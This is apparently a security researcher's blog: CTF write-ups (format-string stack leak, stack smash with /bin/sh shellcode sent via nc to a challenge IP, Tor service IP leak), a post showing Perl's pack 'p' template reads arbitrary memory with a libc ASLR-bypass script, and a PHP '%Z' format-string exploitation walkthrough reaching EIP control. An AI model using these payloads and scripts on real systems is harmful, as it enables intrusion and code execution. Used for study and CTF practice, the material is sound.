

The binary can be downloaded here.


Exploit 100

This challenge supplied a C file and an IP/port combination where the program was said to be running.  The C file read as follows:

#include <stdio.h>
 
int main()
{
  char flag[40];
  char input[40];
 
  FILE* f = fopen("flag", "r");
  fgets(flag, 40, f);
 
  printf("Enter your message: ");
  fgets(input, 40, stdin);
  printf(input);
 
  return 0;
}

As far as I can tell there is only one opportunity for shenanigans here, the printf() being called with our input as the format string, a classic format string vulnerability.  If you’re not familiar with the concept, I would recommend some Googling. :)

Normally in order to exploit a format string vulnerability we would need to jump through some tricky hoops, calculating offsets and overwriting pointers.  However in this case, since the flag is stored directly below our input on the stack, we don’t really need full code execution to win.  All we really need to do is leak data off the stack in the right place.  Printf is perfect for this!  For reference, our stack will probably look something like this (assuming 32-bit):


Unfortunately since the flag itself is on the stack as opposed to a pointer to it, we won’t be able to use the normal “%s” specifier.  Instead we’ll need to leak it using something like “%08x” (an 8-character, 32-bit hexadecimal integer), and then convert the characters back manually.  Also, we can use the “%n$…” format specifier type in order to skip to exactly the offset we want and avoid the 40-character limit problem.  A quick bit of shell scripting gives us an idea of what the stack looks like.  (FYI: this is for fish.  Bash users will need to modify it a bit).


Ah ha!  At offset 8 the data starts to look a lot like ASCII.  Let’s clean up our format string a bit to target exactly what we want.


Let’s throw that in $RandomOnlineASCIIConverter and see what it spits out.

upeR.lbat.meRe.yHxi.tard.[\0][\n]de.

Pretty close! But recall, since this is a little-endian CPU each of those “integers” was retrieved in reverse. Let’s reverse each set of four, remove the dot-separators, and get…

ReputableRemixHydrated[\n][\0]
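
The manual conversion can also be scripted.  The sketch below re-packs each leaked 32-bit value as little-endian bytes, which restores memory order.  The hex words are reconstructed from the converter output shown above ("upeR", "lbat", and so on) rather than copied from the server's actual response, and `decode_words` is a hypothetical helper name.

```python
import struct

# Hex words reconstructed from the converter output above; the server's
# real %x output is not reproduced in this post.
leaked = ["75706552", "6c626174", "6d655265", "79487869", "74617264", "000a6465"]


def decode_words(words):
    """Re-pack each leaked 32-bit value little-endian to recover memory order."""
    return b"".join(struct.pack("<I", int(word, 16)) for word in words)


print(decode_words(leaked))
```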

Exploit 250

Oh good, another binary!  And like the others, this one also comes with an IP/port combination where the program is running.  Opening it in IDA shows an extremely simple program with only two functions, main(), and vuln(), depicted side-by-side here.


These roughly translate to something like:

#include <stdio.h>
 
void vuln() {
  char buffer[72]; // maybe less? (stack alignment)
  printf("Enter your message: ");
  gets(buffer);
  printf("%p\n", buffer);
  puts(buffer);
}
 
int main() {
  setvbuf(stdout, NULL, _IONBF, 0);
  printf("%p\n", vuln);
  vuln();
  return 0;
}

As you can see we have a good ol’ fashioned stack smash at >72 characters.  Easy. :) Add 4 bytes for the saved EBP and we can overwrite EIP at 76 bytes.  Normally we would need an ASLR bypass in order to find our data reliably in memory, however running this a few times and observing the buffer pointer being printed, we can see it never really changes.


0xffffdc80.  Always.  Sweet!  Normally we’d now need to build a ROP chain to bypass NX, but this binary conveniently has that feature disabled.  Too easy!
In order to get code execution I grabbed some shellcode off of exploit-db.  We’re almost done, but there are two problems.

1. At the time the shellcode begins executing, ESP and EIP will be pointing to the same location.  Since our shellcode uses the stack to build the “/bin/sh” string in memory, it will end up overwriting the code we are currently executing and crash.  Doh!  Luckily there’s an easy fix.  We can simply prepend a “sub esp, 0xff” instruction to the shellcode in order to shift the stack up out of the way.

2. The shellcode author forgot to set ECX to NULL, and unfortunately in this case it won’t already be.  Again, easy fix though; we can just add an “xor ecx, ecx” at the end before we perform the system call.

With these two fixes in place, our final shellcode looks like:

00000000 <.data>:
   0:   81 ec ff 00 00 00       sub    esp,0xff
   6:   6a 0b                   push   0xb
   8:   58                      pop    eax
   9:   99                      cdq    
   a:   52                      push   edx
   b:   68 2f 2f 73 68          push   0x68732f2f
  10:   68 2f 62 69 6e          push   0x6e69622f
  15:   89 e3                   mov    ebx,esp
  17:   31 c9                   xor    ecx,ecx
  19:   cd 80                   int    0x80

We’ll need to pad this out to 76 characters with NOPs (0x90), and then put the buffer pointer at the end (little endian!).  When we send it, we’ll pipe the output through cat, and add “/dev/tty” so that we can type once the shell lands.  The final exploit string is:

perl -e 'print "\x90"x(76-27) . \
"\x81\xEC\xFF\x00\x00\x00\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80" . \
"\x80\xdc\xff\xff" . "\n";' \
|cat /dev/stdin /dev/tty| nc 138.247.115.12 3269

And we have our shell!


The binary can be downloaded here.
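
For anyone who prefers Python to a Perl one-liner, the same byte string can be assembled as follows.  This sketch only rebuilds the payload described above (NOP padding, the 27-byte shellcode, then the little-endian buffer pointer); `build_payload` and the constant names are made up for illustration, and sending it over the network is left out.

```python
import struct

BUFFER_ADDR = 0xFFFFDC80   # buffer pointer printed by the target, per the write-up
OFFSET_TO_EIP = 76         # 72-byte buffer + 4 bytes of saved EBP

SHELLCODE = bytes.fromhex(
    "81ecff000000"   # sub esp, 0xff
    "6a0b58"         # push 0xb ; pop eax
    "99"             # cdq
    "52"             # push edx
    "682f2f7368"     # push 0x68732f2f ("//sh")
    "682f62696e"     # push 0x6e69622f ("/bin")
    "89e3"           # mov ebx, esp
    "31c9"           # xor ecx, ecx
    "cd80"           # int 0x80
)


def build_payload():
    """NOP padding + shellcode up to the saved return address, then the pointer."""
    sled = b"\x90" * (OFFSET_TO_EIP - len(SHELLCODE))
    return sled + SHELLCODE + struct.pack("<I", BUFFER_ADDR) + b"\n"


payload = build_payload()
print(len(payload), payload[76:80].hex())
```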

Web 150

This challenge stated: “There is a tor hidden service running at dakotaconk4nfuxu.onion. Your task is to figure out the real IP of the service. The flag is being served on that IP.”

Browsing to this hidden service revealed it was running PHPBB, however the version was current, so no simple exploitation there.

I ran a Nikto scan which revealed the infamous “/server-status” page, however that didn’t reveal the IP address we need.  I started poking around the PHPBB board, and realized the “password reset” feature was enabled, which, if not configured to use Tor, might leak the internal IP in the email headers it sent.  Sure enough, it did!


Unfortunately this box went offline before I got around to writing this walk-through, and I didn’t save screenshots, however from here it was just a matter of running Nmap, noticing that port 1337 was open (weird!) and connecting to receive the flag.  Cool challenge!

Thanks again to Alex for putting this on, and to the Dakota Con team for facilitating the con.  Can’t wait for next year!

Monday, August 8, 2016

Perl Leaks Memory by Design

The title says it all. A Perl script can, by design, read arbitrary memory from the interpreter process. Maybe you were already aware of this, and I’m just late to the game, but… what???!?!

Perl, like many other languages, provides pack()/unpack() functions which allow data to be converted to/from raw binary representations.  For instance, running…

printf("%s", pack("L",0x41424344));

…will print DCBA (on a little-endian machine).  The first argument is a template and specifies how to pack or unpack the data.  For example, in the snippet above, the “L” signifies an unsigned long.  For the most part these functions are implemented as you would expect, however Perl adds an additional template not present in any other language I’ve ever seen: the “p/P” template.  According to the Perl documentation, this template specifies a pointer. [1]  Yes, you read that right, a pointer.  It’s supposed to work like this…

$a = pack("p", "testing testing 123");
 
# prints 0xNNNNNNNN (raw pointer to the string)
printf("0x%08x", unpack("L", $a));
 
# prints "testing testing 123"
printf("%s",  unpack("p", $a));
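
For comparison, here is a rough Python analogue of the two snippets above. It is only a sketch: Python’s struct module has no pointer template, so ctypes stands in for “p”, and the “<L” format forces little-endian where Perl’s “L” uses native byte order.

```python
import ctypes
import struct

# Same idea as pack("L", 0x41424344) on a little-endian machine.
packed = struct.pack("<L", 0x41424344)

# Stand-in for pack("p", ...): take the raw address of a buffer...
buf = ctypes.create_string_buffer(b"testing testing 123")
addr = ctypes.addressof(buf)

# ...and for unpack("p", ...): read a NUL-terminated string back from it.
recovered = ctypes.string_at(addr)

print(packed, hex(addr), recovered)
```

The difference is that Python makes you reach for ctypes explicitly, while Perl exposes the same capability through an ordinary pack() template.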

But if we can control the pointer itself, what else could we read? Let’s try unpack()’ing an arbitrary pointer using the “p” template…

andrew@WOPR ~ % gdb -q perl
Reading symbols from perl...(no debugging symbols found)...done.
(gdb) r -e 'print unpack("p","AAAAAAAA");'
Starting program: /usr/bin/perl -e 'print unpack("p","AAAAAAAA");'
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
 
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff76c5d76 in strlen () from /usr/lib/libc.so.6
(gdb) x/1i $rip
=> 0x7ffff76c5d76 : movdqu (%rax),%xmm4
(gdb) i r $rax
rax            0x4141414141414141   4702111234474983745
(gdb) bt
#0  0x00007ffff76c5d76 in strlen () from /usr/lib/libc.so.6
#1  0x00007ffff7ad8583 in Perl_newSVpv () from /usr/lib/perl5/core_perl/CORE/libperl.so
#2  0x00007ffff7b553a2 in S_unpack_rec () from /usr/lib/perl5/core_perl/CORE/libperl.so
#3  0x00007ffff7b57708 in Perl_unpackstring () from /usr/lib/perl5/core_perl/CORE/libperl.so
#4  0x00007ffff7b578e6 in Perl_pp_unpack () from /usr/lib/perl5/core_perl/CORE/libperl.so
#5  0x00007ffff7abb2c6 in Perl_runops_standard () from /usr/lib/perl5/core_perl/CORE/libperl.so
#6  0x00007ffff7a43379 in perl_run () from /usr/lib/perl5/core_perl/CORE/libperl.so
#7  0x0000000000400e29 in main ()
(gdb)

There you have it. Perl is attempting to read from a completely controllable address. This can be leveraged to leak the entire contents of memory. Let’s do that. The following script will leak memory off the heap until it falls off the page. This could be easily modified to keep leaking the next page(s) too, but I didn’t add that logic.

#!/usr/bin/perl
 
use Time::HiRes;
 
$row_width = 16;
$print_throttle = 10000;
 
$str = "whatever";              # put something on the heap
$ptr = unpack(Q,pack(p,$str));  # get a real pointer to it
 
 
$str2 = "TESTING";
 
for(;;$ptr+=$row_width) {
 
    # print the address
    printf("0x%016x | ", $ptr);
 
    # print $row_width hex bytes
    for($c=0; $c<$row_width; $c++) { 
        $a = unpack(p,pack(Q,$ptr+$c)); # string
        $a = substr($a,0,1);            # single byte
        printf("%02x ", ord($a));
    }
 
    print "| ";
 
    # print real bytes
    for($c=0; $c<$row_width; $c++) { 
        $a = unpack(p,pack(Q,$ptr+$c)); # string
        $a = substr($a,0,1);            # single byte
        # only print ascii
        if(ord($a) >= 0x20 && ord($a) <= 0x7e) {
            printf("%c", ord($a));
        } else {
            printf(".");
        }
    }
 
    printf(" |\n");
 
    # sleep just a moment so we dont spam stdout
    Time::HiRes::usleep($print_throttle);
 
}

Try it yourself! You should see something like this…

andrew@WOPR ~ % /tmp/leak.pl 
0x0000000001895dc0 | 77 68 61 74 65 76 65 72 00 01 87 01 00 00 00 00 | whatever........ |
0x0000000001895dd0 | b8 91 87 01 00 00 00 00 21 00 00 00 00 00 00 00 | ........!....... |
0x0000000001895de0 | 90 5d 89 01 00 00 00 00 28 c1 87 01 00 00 00 00 | .]......(....... |
0x0000000001895df0 | 00 00 00 00 00 00 00 00 41 00 00 00 00 00 00 00 | ........A....... |
0x0000000001895e00 | 00 00 00 00 00 00 00 00 18 5e 89 01 00 00 00 00 | .........^...... |
0x0000000001895e10 | 02 00 00 00 00 00 00 00 97 c6 ad 70 08 00 00 00 | ...........p.... |
0x0000000001895e20 | 50 65 72 6c 49 4f 3a 3a 00 00 00 00 00 00 00 00 | PerlIO::........ |
0x0000000001895e30 | 00 00 00 00 00 00 00 00 61 00 00 00 00 00 00 00 | ........a....... |
0x0000000001895e40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ |
0x0000000001895e50 | 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 | ................ |
0x0000000001895e60 | 70 c1 87 01 00 00 00 00 00 00 00 00 00 00 00 00 | p............... |
0x0000000001895e70 | 00 00 00 00 00 00 00 00 58 c1 87 01 00 00 00 00 | ........X....... |
0x0000000001895e80 | 00 00 00 00 00 00 00 00 b8 5e 89 01 00 00 00 00 | .........^...... |
0x0000000001895e90 | 00 00 00 00 00 00 00 00 41 00 00 00 00 00 00 00 | ........A....... |
0x0000000001895ea0 | 00 00 00 00 00 00 00 00 b8 5e 89 01 00 00 00 00 | .........^...... |
0x0000000001895eb0 | 5d 00 00 00 00 00 00 00 2d d7 2b 1b 0c 00 00 00 | ].......-.+..... |
0x0000000001895ec0 | 2f 74 6d 70 2f 6c 65 61 6b 2e 70 6c 00 00 00 00 | /tmp/leak.pl.... |
0x0000000001895ed0 | 00 00 00 00 00 00 00 00 41 00 00 00 00 00 00 00 | ........A....... |
0x0000000001895ee0 | 00 00 00 00 00 00 00 00 60 6a 03 bb 4a 7f 00 00 | ........`j..J... |
... etc ...
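
The row formatting is the only fiddly part of that script. As a minimal sketch, here is the same formatting in Python, applied to a bytes object rather than live memory; the function name format_row is made up for illustration.

```python
def format_row(addr: int, data: bytes) -> str:
    """Format one dump row: address | hex bytes | printable ASCII |."""
    hex_part = " ".join(f"{b:02x}" for b in data)
    # Same printable range as the Perl script: 0x20 through 0x7e.
    ascii_part = "".join(chr(b) if 0x20 <= b <= 0x7E else "." for b in data)
    return f"0x{addr:016x} | {hex_part} | {ascii_part} |"


# First row of the dump above, rebuilt from its bytes.
row = format_row(0x1895DC0, b"whatever\x00\x01\x87\x01\x00\x00\x00\x00")
print(row)
```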

But we can do better! Even though memory leaks like this don’t give direct code execution, they are extremely useful when combined with another more serious bug, because they provide an easy ASLR bypass. If we can read pointers from memory, we can calculate exactly where code is located. Astute readers may have noticed that the last 8 bytes of the last line above are a pointer to a shared library: 0x00007f4abb036a60 (little-endian reversed of course). All we need to do is predict the relative location of a useful pointer (such as one in libc), and snag it. That turns out to be fairly easy. Observe…

#!/usr/bin/perl
 
# this code is tuned for 64bit and will crash on 32bit
# but there's no reason it wouldn't work there too
# would just take a little modification / heap grooming
 
# by whatever random chance, this broken IO puts a libc
# pointer in just the right place on the heap. *shrug*
open(DERP, "</etc/passwd");
while(<DERP>){};
 
$libc = 0x0;
 
$str = "whatever";              # put something on the heap
$ptr = unpack(Q,pack(p,$str));  # get a real pointer to it
$ptr = $ptr + 8;                # the libc ptr is just past it
for($c=0;$c<8;$c++) {
    # read 8 bytes and lay them over $libc
    $byte = substr(unpack(p,pack(Q,$ptr+$c)),0,1);
    $libc += ord($byte) << ($c * 8);
}
 
# the libc base is either at $libc-0x394100 or $libc-0x38c100
# we can't be sure which, but either way the memory is readable
# so we just look for \x7fELF and choose the one that has it :)
# 0x156 == '\x7f' + 'E' + 'L' + 'F'
$header_sum = 0;
for($c=0;$c<4;$c++) {
    $byte = substr(unpack(p,pack(Q,$libc-0x38c100+$c)),0,1);
    $header_sum += ord($byte);
}
if($header_sum == 0x156) {
    $libc -= 0x38c100;
} else {
    $libc -= 0x394100;
}
 
printf("LEAKED: libc @ 0x%012x\n", $libc);
printf("Checking with /proc/self/maps to make sure...\n");
open(FILE, "</proc/self/maps");
while(<FILE>) { if(/libc-/) { print "$_"; } }

I’ve only tested this code on a few systems (Arch and Debian), but it worked nicely on both. Your mileage may vary. If all goes well, you should see…

andrew@WOPR ~ % /tmp/aslr_bypass.pl     
LEAKED: libc @ 0x7ffac762c000
Checking with /proc/self/maps to make sure...
7ffac762c000-7ffac77c3000 r-xp 00000000 fe:01 4862344                    /usr/lib/libc-2.23.so
7ffac77c3000-7ffac79c3000 ---p 00197000 fe:01 4862344                    /usr/lib/libc-2.23.so
7ffac79c3000-7ffac79c7000 r--p 00197000 fe:01 4862344                    /usr/lib/libc-2.23.so
7ffac79c7000-7ffac79c9000 rw-p 0019b000 fe:01 4862344                    /usr/lib/libc-2.23.so
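
The two bits of arithmetic in that script (reassembling a little-endian pointer one byte at a time, and the “\x7fELF” checksum) can be checked in isolation. The Python sketch below mirrors the Perl logic; read_bytes is a hypothetical callback standing in for the unpack(p, ...) read primitive, and the two candidate offsets are the ones from the script, which will differ between libc builds.

```python
ELF_MAGIC_SUM = sum(b"\x7fELF")  # 0x7f + 'E' + 'L' + 'F'


def le_bytes_to_int(raw: bytes) -> int:
    """Lay bytes over an integer, lowest byte first, like the Perl loop."""
    value = 0
    for i, byte in enumerate(raw):
        value += byte << (i * 8)
    return value


def pick_libc_base(leaked_ptr: int, read_bytes) -> int:
    """Try the first candidate offset, fall back to the second."""
    if sum(read_bytes(leaked_ptr - 0x38C100, 4)) == ELF_MAGIC_SUM:
        return leaked_ptr - 0x38C100
    return leaked_ptr - 0x394100


# Last 8 bytes of the final dump row shown earlier in this post.
pointer = le_bytes_to_int(bytes.fromhex("606a03bb4a7f0000"))
print(hex(pointer), hex(ELF_MAGIC_SUM))
```

A byte sum is a loose test, since other byte combinations add up to the same value. Comparing the four bytes against b"\x7fELF" directly would be stricter.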

All of that being the case, is this a serious security concern? Probably not, no. To be fair, I can’t think of a situation in which it would pose a real threat, but I still find it shocking and bizarre. When I mentioned it to the development team they stated:
“It’s as ugly as hell, but there may be people still using it, which is why we’re reluctant to get rid of it.  The question is whether it represents any sort of security issue. I can’t currently see that it does.”
Since any sort of “exploit” for this issue requires the ability to run arbitrary Perl anyway, I tend to agree.  An attacker who can run code already could just as easily read /proc/self/mem, or do any number of much more malicious things. Even a malicious script uploaded to a webserver wouldn’t need an exploit, since Perl does not offer the same “safe mode” functionality that similar languages like PHP do. Any attacker who can run unpack() can already do far worse.

Regardless, it seems wrong to me that interpreted code should be allowed to access memory directly.  Is that not one of the core advantages of an interpreted language: to keep the code from doing dangerous things with memory? Maybe this doesn’t pose a threat, but at the very least I’ll agree with the “ugly as hell” sentiment.

That said, if anyone can think of a situation in which this IS highly dangerous I’d love to hear about it. Feel free to comment below or send me a message directly. Until then we can just categorize this as “LOL”, and move on. :)

[1]. http://perldoc.perl.org/functions/pack.html

Thursday, July 28, 2016

Exploiting PHP Format String Bugs the Easy Way

I’ve been spending a lot of time poking through the PHP source-code lately, and twice now I’ve come across format string vulnerabilities. [1][2]  I don’t consider format string bugs particularly interesting in-and-of themselves (they’re well known, and well understood), but it turns out PHP format strings are special.  PHP adds functionality that makes these bugs a breeze to exploit.  Let me explain…

First though, full disclosure: this technique is not entirely my own.  The original idea was inspired by Stefan Esser (@i0n1c) back in November of 2015. [3]  If you enjoy security research, especially relating to PHP, I would highly recommend you follow him!

Ok, PHP handles most format strings using custom internal functions.  There are lots of these defined all throughout the code.  For instance let’s grep for function definitions containing a format string as an argument.  This isn’t perfect or scientific, but it gives you an idea.

andrew@thinkpad /tmp % grep -PRHn "const char ?\* ?(format|fmt)" ./php-7.0.3 | wc -l
149

I won’t post all of those, but here are two examples.  In fact, these are the same functions that were erroneously called in the two bugs linked below.

static void zend_throw_or_error(int fetch_type, zend_class_entry *exception_ce, const char *format, ...)
ZEND_API ZEND_COLD zend_object *zend_throw_exception_ex(zend_class_entry *exception_ce, zend_long code, const char *format, ...)
... etc ...

Most, if not all, of these internal format string functions ultimately call either “xbuf_format_converter” (defined in main/spprintf.c), or “format_converter” (defined in main/snprintf.c).  These two functions actually do the work of walking along the string and substituting specifiers with their corresponding values.  This would be totally uninteresting, except for the fact that PHP adds one block that you don’t see in other format string implementations.  From “main/spprintf.c”…

case 'Z': {
    zvp = (zval*) va_arg(ap, zval*);
    free_zcopy = zend_make_printable_zval(zvp, &zcopy);
    if (free_zcopy) {
        zvp = &zcopy;
    }
    s_len = Z_STRLEN_P(zvp);
    s = Z_STRVAL_P(zvp);
    if (adjust_precision && precision < s_len) {
        s_len = precision;
    }
    break;
}

This special “%Z” option is designed to convert what’s known as a “zval” to a string. A zval (defined in Zend/zend_types.h) is simply a structure containing information about a variable, such as its type and value. Here is its definition, watered down for clarity…

typedef union _zend_value {
    zend_string      *str;
    zend_array       *arr;
    zend_object      *obj;
    ... lots of possible types ...
} zend_value;
 
struct _zval_struct {
    zend_value        value;
    union {
        struct {
            ZEND_ENDIAN_LOHI_4(
                zend_uchar    type,
                zend_uchar    type_flags,
                zend_uchar    const_flags,
                zend_uchar    reserved)
        } v;
        uint32_t type_info;
    } u1;
    ... uninteresting bits removed ...
 
};

As you can see, a zval contains type information, as well as an element (value) which can be interpreted in any number of different ways depending on the declared type. Now… as long as the code above is operating on a real zval (which is assumed to be the case since the “%Z” is only used internally), everything will work fine. However, if we are able to specify a “%Z” on data we control, as is the case with format string bugs, we can force PHP to do unexpected things. So… let’s assume we can control the data; what’s actually going on here? As you can see above, when “%Z” is specified, PHP calls “zend_make_printable_zval” on our fake zval, which eventually calls “_zval_get_string_func” (defined in Zend/zend_operators.c).  This function contains a switch/case operating on the “type” field of the zval struct.  Most of the cases are boring, converting integers to strings and such, but one stands out: IS_OBJECT.

case IS_OBJECT: {
   zval tmp;
   if (Z_OBJ_HT_P(op)->cast_object) {
      if (Z_OBJ_HT_P(op)->cast_object(op, &tmp, IS_STRING) == SUCCESS) {
... etc ...

Function pointers!  That looks juicy!  Let’s investigate those macros.  From Zend/zend_types.h:

#define Z_OBJ(zval)        (zval).value.obj
#define Z_OBJ_P(zval_p)    Z_OBJ(*(zval_p))
 
#define Z_OBJ_HT(zval)     Z_OBJ(zval)->handlers
#define Z_OBJ_HT_P(zval_p) Z_OBJ_HT(*(zval_p))

Oh goodie! :) If we use the “%Z” operator on memory we control, we will control those function pointers too!  All we need to do is arrange a fake zval in memory such that they become something useful.  Since we know what the struct(s) should look like, this shouldn’t be too hard.

In order to test this, we’ll use the SNMP error format string bug (php bug #71704) [2]. The trigger looks like this:

$session = new SNMP(SNMP::VERSION_3, "127.0.0.1:161", "public");
$session->exceptions_enabled = SNMP::ERRNO_ANY;
try {
    $session->get($argv[1]); // FORMAT STRING IN ARGV[1]
} catch (SNMPException $e) {
    echo $e->getMessage();
}

Let’s start by poking around memory to find a pointer to our data.  We’ll use a series of “%d”s to walk down the stack, followed by “woot%swoot”.  If we ever see our data show up between the “woot” flags, we win!

andrew@thinkpad /tmp % for i in {0..15}; do \
> echo -e "\n=========$i=========="; \
> ./php-7.0.3/sapi/cli/php ./snmp.php \
>     `perl -e 'print "%d"x'$i' . "woot%swoot";'`; \
> done
 
=========0==========
Invalid object identifier: woot0�%�
                                   �'�
                                      �'�U�woot
=========1==========
woot
=========2==========
Invalid object identifier: -1077237472-1216724645woot �%��Iwoot
=========3==========
Segmentation fault (core dumped)
 
=========4==========
Invalid object identifier: -1079040880-1216933541-12561159361wootwoot
=========5==========
Segmentation fault (core dumped)
 
=========6==========
Invalid object identifier: -1074727184-1216655013-12561159361-12561159361woot(null)woot
=========7==========
Invalid object identifier: -1076316912-1217130149-12561159361-125611593610woowoot
=========8==========
Invalid object identifier: -1080902384-1217461925-12582130881-125821308810-1257840348woot�� ��$�woot
=========9==========
Invalid object identifier: -1075700320-1217191589-12561159361-125611593610-1255743196136380004woot$�&�woot
=========10==========
Invalid object identifier: -1079922576-1217162917-12561159361-125611593610-1255743196136380004-1256115968woot(null)woot
=========11==========
Segmentation fault (core dumped)
 
=========12==========
Invalid object identifier: -1075153200-1217171109-12561159361-125611593610-1255743196136380004-1256115968032wootInvalid object identifier: %swoot
=========13==========
Invalid object identifier: -1081187680-1217064613-12561159361-125611593610-1255743196136380004-1256115968032142166864woot%d%d%d%d%d%d%d%d%d%d%d%d%dwoot%swootwoot
=========14==========
Invalid object identifier: -1078765664-1216839333-12561159361-125611593610-1255743196136380004-1256115968032142166864-1255809008wootwoot
=========15==========
Invalid object identifier: -1075294480-1216716453-12561159361-125611593610-1255743196136380004-1256115968032142166864-1255809008-1255702516woot�woottnvalid object identifier: -1079248000woot�åN

Aha!!! If you didn’t already see it, check out number 13.  After popping 13 values off the stack, the 14th value was a pointer to our string. Switching the “%s” with a “%08x” reveals the pointer to be 0xb5a5e010.  It doesn’t seem to change much, so for now let’s ignore the obvious ASLR problem and focus on getting EIP.
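
Spotting the right iteration by eye works, but the check is easy to automate. Here is a minimal Python sketch: it rebuilds the probe for a given number of “%d”s and reports whether that exact probe shows up in the program’s output, which only happens when the “%s” dereferenced a pointer to our own string. The function names are made up for illustration.

```python
def make_probe(pops: int) -> str:
    """Format string with `pops` stack pops followed by the marked %s."""
    return "%d" * pops + "woot%swoot"


def reflects_probe(pops: int, output: str) -> bool:
    """True if the raw probe was echoed back inside the output."""
    return make_probe(pops) in output


# Shape of the output from iteration 13 (leading numbers trimmed).
sample = "Invalid object identifier: 142166864woot" + make_probe(13) + "woot"
print(reflects_probe(13, sample))
```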

First let’s open it up in gdb and see what’s happening.  We know that PHP will be expecting a zval at the pointer, so let’s add some junk data to the start of our string.  This will be our fake zval.  Based on the struct definition above, we know the 9th byte represents the type.  In this case we’d like to represent the OBJECT type, which is 0x08.  Let’s also add some extra padding so that we have room to play as we go. All said, our fake zval will look like:

[ fake zval ............ ][ junk ......][ format string  ]
[ 8bytes padding ][ 0x08 ][some padding][ %d x 13 ][ %Z  ]
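
The same layout, expressed as a small Python sketch. It assumes the 32-bit build used here, where the value union occupies the first 8 bytes and the type byte follows at offset 8; the helper names are made up for illustration.

```python
IS_OBJECT = 0x08  # type tag for objects, as stated above


def fake_zval(value: bytes, ztype: int = IS_OBJECT) -> bytes:
    """8 bytes standing in for the value union, then the one-byte type."""
    if len(value) != 8:
        raise ValueError("value must be exactly 8 bytes")
    return value + bytes([ztype])


def build_argument(zval: bytes, padding: bytes = b"CCCC", pops: int = 13) -> bytes:
    """Fake zval, some padding, then the format string that reaches it."""
    return zval + padding + b"%d" * pops + b"%Z"


arg = build_argument(fake_zval(b"AAAABBBB"))
print(arg)
```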

andrew@thinkpad /tmp % gdb -q ./php-7.0.3/sapi/cli/php 
Reading symbols from ./php-7.0.3/sapi/cli/php...done.
(gdb) r ./snmp.php `echo -e "AAAABBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
Starting program: /home/ubuntu/php-7.0.3/sapi/cli/php ./snmp.php `echo -e "AAAABBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
 
Program received signal SIGSEGV, Segmentation fault.
0x08301482 in _zval_get_string_func (op=op@entry=0xb5a5e010)
    at /home/ubuntu/php-7.0.3/Zend/zend_operators.c:838
838             if (Z_OBJ_HT_P(op)->cast_object) {
(gdb) x/1i $eip
=> 0x8301482 <_zval_get_string_func>:  mov    0x10(%ebx),%edx
(gdb) i r $ebx
ebx            0x41414141   1094795585
(gdb)

Nice! We landed just where we wanted to, and now PHP is trying to dereference our AAAA. We’d like to give it a valid address, so how about the address of BBBB directly after? Math time: if AAAA is at 0xb5a5e010, that means BBBB is at 0xb5a5e014. However, the instruction isn’t dereferencing the pointer exactly, but rather, 16 bytes past it (0x10). So we need to subtract 0x10 from our pointer to account, giving us 0xb5a5e004. Let’s try it. Don’t forget to reverse it, since x86 is little endian.

andrew@thinkpad /tmp % gdb -q ./php-7.0.3/sapi/cli/php 
Reading symbols from ./php-7.0.3/sapi/cli/php...done.
(gdb) r ./snmp.php `echo -e "\x04\xe0\xa5\xb5BBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
Starting program: /home/ubuntu/php-7.0.3/sapi/cli/php ./snmp.php `echo -e "\x04\xe0\xa5\xb5BBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
 
Program received signal SIGSEGV, Segmentation fault.
0x08301485 in _zval_get_string_func (op=op@entry=0xb5a5e010)
    at /home/ubuntu/php-7.0.3/Zend/zend_operators.c:838
838             if (Z_OBJ_HT_P(op)->cast_object) {
(gdb) x/1i $eip
=> 0x8301485 <_zval_get_string_func>:  mov    0x54(%edx),%eax
(gdb) i r $ebx $edx
ebx            0xb5a5e004   -1247420412
edx            0x42424242   1111638594
(gdb)

Sweet! It used our pointer and is trying to dereference BBBB. Rinse and repeat. This time let’s target CCCC. Since they’re 9 bytes into the string, the pointer will be 0xb5a5e019, however again we need to account for the offset. This time it’s 0x54. Simple subtraction gives us 0xb5a5dfc5. Let’s try it.

andrew@thinkpad /tmp % gdb -q ./php-7.0.3/sapi/cli/php 
Reading symbols from ./php-7.0.3/sapi/cli/php...done.
(gdb) r ./snmp.php `echo -e "\x04\xe0\xa5\xb5\xc5\xdf\xa5\xb5\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
Starting program: /home/ubuntu/php-7.0.3/sapi/cli/php ./snmp.php `echo -e "\x04\xe0\xa5\xb5\xc5\xdf\xa5\xb5\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
 
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) i r $ebx $edx $eip
ebx            0xb5a5e004   -1247420412
edx            0xbfffb060   -1073762208
eip            0x43434343   0x43434343
(gdb)
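
To recap the pointer math from the last two steps, here is a Python sketch that rebuilds the final argument. The string address and both offsets come from the gdb sessions above and are specific to this particular build; the constant names are made up for illustration.

```python
import struct

STRING_ADDR = 0xB5A5E010    # where our string lives (leaked with %08x)
HANDLERS_OFFSET = 0x10      # from: mov 0x10(%ebx),%edx
CAST_OBJECT_OFFSET = 0x54   # from: mov 0x54(%edx),%eax


def p32(value: int) -> bytes:
    """Pack a 32-bit value in little-endian byte order."""
    return struct.pack("<I", value & 0xFFFFFFFF)


# value.obj: chosen so that obj + 0x10 lands on bytes 4..7 of the string.
obj_ptr = (STRING_ADDR + 4) - HANDLERS_OFFSET
# handlers: chosen so that handlers + 0x54 lands on "CCCC" at offset 9.
handlers_ptr = (STRING_ADDR + 9) - CAST_OBJECT_OFFSET

payload = p32(obj_ptr) + p32(handlers_ptr) + b"\x08" + b"CCCC" + b"%d" * 13 + b"%Z"
print(hex(obj_ptr), hex(handlers_ptr), payload[:13])
```

Whatever four bytes replace “CCCC” end up in EIP.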

We win! With control of EIP it’s essentially game over. The only big problem still standing in our way is ASLR. Considering the wide variation of PHP binaries that exist in the wild as well as the prevalence of ASLR, this would normally be quite tricky. But we have another trick up our sleeve. We can cheat!

